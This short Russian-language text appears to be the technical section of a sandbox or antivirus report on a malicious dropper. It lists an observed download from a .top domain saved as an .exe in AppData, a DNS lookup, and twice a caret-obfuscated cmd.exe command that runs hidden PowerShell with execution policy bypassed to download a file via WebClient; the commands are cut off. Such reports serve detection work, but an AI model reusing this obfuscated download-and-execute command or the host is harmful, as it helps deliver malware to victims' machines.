Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^wErSHe^L^L.^EXE -EXE^CU^T^iOnpo^LI^cy ^By^pAsS -NOP^RO^fi^L^e -WINdO^ws^T^YlE ^hIdD^e^n^ (n^e^w^-ObJ^ECt ^Sy^sTe^m.nE^T.^W^E^BcLi^EN^t^)^.d^own^l^OadFIlE('http://www.zonedopes...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "p^o^wErSHe^L^L.^EXE -EXE^CU^T^iOnpo^LI^cy ^By^pAsS -NOP^RO^fi^L^e -WINdO^ws^T^YlE ^hIdD^e^n^ (n^e^w^-ObJ^ECt ^Sy^sTe^m.nE^T.^W^E^BcLi^EN^t^)^.d^own^l^OadFIlE('http://www.zonedopes...' (со скрытым окном)